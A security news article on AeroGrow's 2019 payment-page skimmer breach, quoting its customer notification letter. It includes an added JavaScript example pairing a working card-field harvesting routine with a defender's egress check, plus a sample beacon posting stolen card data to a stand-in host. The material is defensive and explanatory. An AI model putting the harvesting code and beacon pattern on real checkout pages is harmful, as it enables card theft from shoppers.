AeroGrow recently notified its customers of a payment card data breach. The incident affected the company's website.
“On March 4, 2019, AeroGrow learned that an unauthorized person may have acquired, through the use of malicious code, the payment card information that users entered into the eCommerce vendor’s payment page,” reads the data breach notification letter sent to the affected customers. “Upon learning of the incident, we immediately removed the malicious code and secured the website.”
The letter was also filed with the California Office of the Attorney General. AeroGrow determined that the attackers had injected a skimmer into the payment page of its website.
The malicious code remained undetected from October 29, 2018 until March 4, 2019.
The skimmer was able to capture the card number, the expiration date and the CVV/CCV code that customers entered during the checkout process.
Social Security numbers, card PINs and other financial account information were not exposed because the company did not request them. Skimmers of this kind generally harvest only the payment card data typed into the form.
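A page-level skimmer of the kind described here has to do two things: recognise card data among the fields a customer submits, and send it to a host the merchant does not control. The following JavaScript is an added illustration, not AeroGrow's code or the skimmer found on its site; the host names, field names and sample values are constructed for the example. It pairs the value-shape recognition a generic skimmer relies on with the mirror-image check a defender can run on outbound requests from a checkout page.

```javascript
// Added example (not AeroGrow's code, nor the skimmer from the incident).
// Left half: how a generic payment-page skimmer picks card data out of a
// submitted form. Right half: how a defender spots that same data leaving
// the page for a host that is not on the allowlist.

// Luhn checksum: the test that separates a real card number from any other
// run of digits typed into a form. Used by both sides below.
function luhnValid(digits) {
  if (!/^\d{13,19}$/.test(digits)) return false;
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Skimmer side: select PAN, expiry and CVV by the shape of the value rather
// than by field name, which is why one skimmer works on checkout pages it
// was never written for. Order matters: expiry is tested before CVV so a
// "09/23" style value is not mistaken for a security code.
function harvestCardFields(fields) {
  const out = {};
  for (const raw of Object.values(fields)) {
    const v = String(raw).trim();
    const digits = v.replace(/[\s-]/g, '');
    if (!out.pan && luhnValid(digits)) out.pan = digits;
    else if (!out.expiry && /^(0[1-9]|1[0-2])\s*\/\s*(\d{2}|\d{4})$/.test(v)) out.expiry = v.replace(/\s/g, '');
    else if (!out.cvv && /^\d{3,4}$/.test(v)) out.cvv = v;
  }
  return out;
}

// Defender side. The allowlist (first party plus payment processor) is an
// assumption for this example; in a real shop it comes from the checkout
// page's known dependencies.
const ALLOWED_HOSTS = new Set(['shop.example', 'api.payment-processor.example']);

// Find Luhn-valid 13-19 digit numbers in a request body, tolerating the
// spaces and dashes customers type into card fields.
function findPans(text) {
  const found = new Set();
  for (const m of String(text).matchAll(/\d(?:[ -]?\d){12,18}/g)) {
    const digits = m[0].replace(/[\s-]/g, '');
    if (luhnValid(digits)) found.add(digits);
  }
  return [...found];
}

// A request carrying a card number to a host outside the allowlist is a
// skimming indicator; card data going to the processor is normal, and a
// beacon without card data is just analytics.
function inspectOutboundRequest(url, body, allowed = ALLOWED_HOSTS) {
  const host = new URL(url).hostname;
  const pans = findPans(body);
  return { host, pans, suspicious: pans.length > 0 && !allowed.has(host) };
}

// Constructed sample checkout form (test card number, not a real account).
const sampleCheckoutForm = {
  billing_name: 'Jane Doe',
  card_number: '4111 1111 1111 1111',
  exp: '09/23',
  security_code: '123',
  postal_code: '80301',
};

// Constructed exfiltration beacon, modelled on the pattern of posting the
// harvested fields to an attacker-controlled "analytics" host.
const sampleExfil = {
  url: 'https://cdn-stats.example.net/collect',
  body: JSON.stringify(harvestCardFields(sampleCheckoutForm)),
};

console.log('skimmer would collect:', harvestCardFields(sampleCheckoutForm));
console.log('egress check on beacon:', inspectOutboundRequest(sampleExfil.url, sampleExfil.body));
console.log('egress check on processor call:',
  inspectOutboundRequest('https://api.payment-processor.example/v1/tokens', sampleExfil.body));
```

In practice the allowlist is enforced rather than merely logged: a Content-Security-Policy `connect-src` directive restricted to the same hosts would have blocked the beacon in the browser, and an integrity check on the deployed payment page (Subresource Integrity for third-party scripts, a hash comparison for first-party ones) would catch the injected script itself rather than its traffic.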
The company said it has taken steps to secure its systems and will offer affected individuals one year of free identity protection services through Experian.
“AeroGrow takes seriously both the security of your payment card information and this incident. We have informed law enforcement and will cooperate with their investigation. We have not delayed notifying you at the request of law enforcement,” continues the letter.
“In addition, we have taken the appropriate steps to limit the likelihood of a recurrence, and we have engaged a third-party expert to conduct a thorough review of our security protocols. Out of an abundance of caution, AeroGrow is offering you one year of identity protection services at no cost to you through Experian, one of the three nationwide credit bureaus.”
AeroGrow disclosed another payment card breach in 2015; in that case, too, the attackers used a skimmer to steal card data.
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member of CSIRT.UBI and Editor-in-Chief of the computer security blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also a freelance writer (Infosec Resources Institute and Cyber Defense Magazine) and the developer of 0xSI_f33d, a feed that compiles phishing and malware campaigns targeting Portuguese citizens.